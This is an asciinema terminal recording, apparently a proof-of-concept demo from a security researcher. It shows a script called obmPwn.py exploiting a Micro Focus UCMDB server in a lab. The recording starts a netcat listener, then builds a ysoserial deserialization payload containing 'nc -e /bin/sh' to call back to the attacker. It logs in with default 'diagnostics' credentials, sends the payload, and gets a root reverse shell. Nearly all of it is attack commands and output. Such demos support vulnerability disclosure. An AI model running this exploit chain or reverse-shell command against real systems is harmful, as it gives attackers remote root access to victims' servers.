{"version": 2, "width": 95, "height": 26, "timestamp": 1606814929, "env": {"SHELL": "/bin/bash", "TERM": "screen-256color"}}
[0.075033, "o", "\u001b[?2004h@pedrib1337 >$ "]
[1.922185, "o", "p"]
[2.078449, "o", "i"]
[2.226242, "o", "n"]
[2.338237, "o", "g"]
[2.410246, "o", " "]
[3.101945, "o", "1"]
[3.273933, "o", "0"]
[3.458195, "o", "."]
[3.665956, "o", "9"]
[3.910031, "o", "."]
[4.454103, "o", "8"]
[4.658334, "o", "."]
[4.802098, "o", "1"]
[4.869816, "o", "2"]
[5.058026, "o", "3"]
[5.230735, "o", "\r\n"]
[5.231487, "o", "\u001b[?2004l\r"]
[5.23577, "o", "PING 10.9.8.123 (10.9.8.123) 56(84) bytes of data.\r\n"]
[5.23711, "o", "64 bytes from 10.9.8.123: icmp_seq=1 ttl=64 time=0.973 ms\r\n"]
[6.238041, "o", "64 bytes from 10.9.8.123: icmp_seq=2 ttl=64 time=0.555 ms\r\n"]
[7.181993, "o", "^C"]
[7.182387, "o", "\r\n--- 10.9.8.123 ping statistics ---\r\n2 packets transmitted, 2 received, 0% packet loss, time 1001ms\r\nrtt min/avg/max/mdev = 0.555/0.764/0.973/0.209 ms\r\n"]
[7.183102, "o", "\u001b[?2004h@pedrib1337 >$ "]
[7.77906, "o", "p"]
[7.998657, "o", "y"]
[8.270276, "o", "t"]
[8.362738, "o", "h"]
[8.518448, "o", "o"]
[8.686979, "o", "n"]
[8.854385, "o", "3"]
[8.966303, "o", " "]
[9.313835, "o", "o"]
[9.449968, "o", "b"]
[9.675815, "o", "\u0007m"]
[10.118854, "o", "P"]
[10.267473, "o", "wn.py "]
[10.741974, "o", "\r\n"]
[10.742344, "o", "\u001b[?2004l\r"]
[10.977419, "o", "Usage: ./obmPwn.py <RHOST> <YSOSERIAL_JAR> <COMMAND>\r\n"]
[11.000578, "o", "\u001b[?2004h"]
[11.00082, "o", "@pedrib1337 >$ "]
[14.52629, "o", "n"]
[14.622909, "o", "c"]
[14.698594, "o", " "]
[15.430271, "o", "-"]
[15.674079, "o", "l"]
[16.115004, "o", "v"]
[16.306599, "o", "n"]
[16.549883, "o", "k"]
[17.954484, "o", "p"]
[18.023007, "o", " "]
[18.502256, "o", "4"]
[18.641904, "o", "4"]
[18.770368, "o", "4"]
[19.521994, "o", "6"]
[19.690017, "o", " "]
[20.665995, "o", "&"]
[21.253943, "o", "\r\n"]
[21.254256, "o", "\u001b[?2004l\r"]
[21.254941, "o", "[1] 108077\r\n"]
[21.255428, "o", "\u001b[?2004h@pedrib1337 >$ "]
[21.256841, "o", "Listening on 0.0.0.0 4446\r\n"]
[22.545799, "o", "\r\n\u001b[?2004l\r"]
[22.545891, "o", "\u001b[?2004h"]
[22.545917, "o", "@pedrib1337 >$ "]
[23.453988, "o", "p"]
[23.674377, "o", "y"]
[23.95393, "o", "t"]
[24.005928, "o", "h"]
[24.162269, "o", "o"]
[24.314184, "o", "n"]
[24.413965, "o", "3"]
[24.474308, "o", " "]
[24.614702, "o", "o"]
[24.714491, "o", "b"]
[24.854542, "o", "m"]
[25.390627, "o", "P"]
[25.506183, "o", "wn.py "]
[26.174225, "o", "1"]
[26.922709, "o", "0"]
[27.130807, "o", "."]
[27.314742, "o", "9"]
[27.562702, "o", "."]
[27.834767, "o", "8"]
[28.699025, "o", "."]
[29.054468, "o", "1"]
[29.131064, "o", "2"]
[29.362788, "o", "3"]
[29.866498, "o", " "]
[30.882355, "o", "y"]
[30.981935, "o", "s"]
[31.143009, "o", "o"]
[31.235976, "o", "\u0007serial-"]
[31.693863, "o", "0"]
[31.810946, "o", ".0.6-SNAPSHOT-all.jar "]
[33.549796, "o", "'"]
[33.886658, "o", "n"]
[33.981882, "o", "c"]
[34.194408, "o", " "]
[34.526312, "o", "-"]
[35.127344, "o", "\b\u001b[K"]
[35.510829, "o", "-"]
[35.941721, "o", "e"]
[36.066154, "o", " "]
[36.318618, "o", "/"]
[36.477947, "o", "b"]
[36.566626, "o", "i \r"]
[36.722634, "o", "n"]
[36.930051, "o", "/"]
[37.238435, "o", "s"]
[37.349837, "o", "h"]
[37.454882, "o", " "]
[38.606588, "o", "1"]
[38.702063, "o", "0"]
[38.941887, "o", "."]
[39.265688, "o", "9"]
[39.501996, "o", "."]
[39.714003, "o", "8"]
[39.942245, "o", "."]
[40.054636, "o", "1"]
[40.138337, "o", " "]
[40.44648, "o", "4"]
[40.605708, "o", "4"]
[40.749667, "o", "4"]
[41.437952, "o", "6"]
[41.738692, "o", "'"]
[43.633809, "o", "\r\n"]
[43.634007, "o", "\u001b[?2004l\r"]
[43.859771, "o", "[*] Generating ysoserial payload with command nc -e /bin/sh 10.9.8.1 4446\r\n"]
[44.688242, "o", "[*] Authenticating to https://10.9.8.123:8443/ucmdb-ui/cms/loginRequest.do;?customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB\r\n"]
[44.829546, "o", "[+] We are now authenticated and obtained our LWSSO_COOKIE_KEY!\r\n[*] Sending ysoserial payload to https://10.9.8.123:8443/ucmdb-ui/services/SecurityService\r\n"]
[44.883448, "o", "[+] Success, your command has been executed!\r\n"]
[44.898559, "o", "Connection received on 10.9.8.123 52062\r\n"]
[44.911512, "o", "\u001b[?2004h@pedrib1337 >$ "]
[46.630845, "o", "f"]
[46.810557, "o", "g"]
[46.994763, "o", "\r\n"]
[46.995321, "o", "\u001b[?2004l\r"]
[46.996113, "o", "nc -lvnkp 4446\r\n"]
[47.818377, "o", "w"]
[47.8979, "o", "h"]
[48.057984, "o", "o"]
[48.157864, "o", "a"]
[48.249745, "o", "m"]
[48.422369, "o", "i"]
[48.66224, "o", "\r\n"]
[48.667764, "o", "root\r\n"]
[50.202174, "o", "i"]
[50.290072, "o", "d"]
[50.462077, "o", "\r\n"]
[50.469063, "o", "uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0\r\n"]
[51.077576, "o", "u"]
[51.253421, "o", "n"]
[51.377861, "o", "a"]
[51.469707, "o", "m"]
[51.573633, "o", "e"]
[51.649571, "o", " "]
[51.825931, "o", "-"]
[51.985781, "o", "a"]
[52.653716, "o", "\r\n"]
[52.656919, "o", "Linux centos7.nat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\r\n"]
[55.025961, "o", "l"]
[55.130366, "o", "s"]
[55.186464, "o", " "]
[55.334457, "o", "-"]
[56.062351, "o", "l"]
[56.289657, "o", "\r\n"]
[56.297886, "o", "total 1108\r\n-rwxr-xr-x. 1 root   root     947 Apr  1  2020 configure.sh\r\n-rwxrwxr-x. 1 root   root   55808 May 28  2020 DDJDBCAuth05.dll\r\n-rwxrwxr-x. 1 root   root   62464 May 28  2020 DDJDBCx64Auth05.dll\r\n-rw-r--r--. 1 root   root   25048 May 28  2020 hs_err_pid18626.log\r\n-rw-r--r--. 1 root   root   25048 May 28  2020 hs_err_pid18783.log\r\n-rw-r--r--. 1 root   root   24999 May 28  2020 hs_err_pid18955.log\r\n-rw-r--r--. 1 root   root   25098 May 28  2020 hs_err_pid19112.log\r\n-rw-r--r--. 1 root   root   25001 May 28  2020 hs_err_pid19200.log\r\n-rw-r--r--. 1 root   root   25001 May 28  2020 hs_err_pid19457.log\r\ndrwxrwxr-x. 4 root   root      95 May 28  2020 jre\r\n-rwxrwxr-x. 1 root   root     342 May 28  2020 key-truststore.sh\r\n-rwxr-xr-x. 1 root   root  132128 Apr 11  2018 libwrapper.so\r\n-rwxrwxr-x. 1 root   root     283 May 28  2020 search.conf\r\n-rwxr-xr-x. 1 root   root   20212 Apr  1  2020 server.sh\r\n-rwxrwxr-x. 1 root   root     231 May 28  2020 solr.bat\r\n-rwxrwxr-x. 1 root   root     243 May 28  2020 solr.sh\r"]
[56.298272, "o", "\n-rwxr-xr-x. 1 root   root  641544 Apr 11  2018 wrapper\r\n-rwxrwxr-x. 1 root   root    9411 Dec  1 09:01 wrapper.conf\r\n-rwxrwxr-x. 1 root   root     509 May 28  2020 wrapper-license.conf\r\n-rw-rw-r--. 1 175971 10004    415 Dec  1 09:01 wrapper-platform.conf\r\n"]
[58.345606, "o", "P"]
[58.421559, "o", "W"]
[58.569426, "o", "N"]
[58.665645, "o", "E"]
[58.781785, "o", "D"]
[59.013819, "o", "!"]
[59.410072, "o", "\r\n"]
[59.789514, "o", "^C"]
[59.790226, "o", "\r\n"]
[59.790671, "o", "\u001b[?2004h@pedrib1337 >$ "]
[60.325982, "o", "e"]
[60.485701, "o", "x"]
[60.593754, "o", "i"]
[60.721709, "o", "t"]
[60.937725, "o", "\r\n"]
[60.93803, "o", "\u001b[?2004l\r"]
[60.942174, "o", "exit\r\n"]
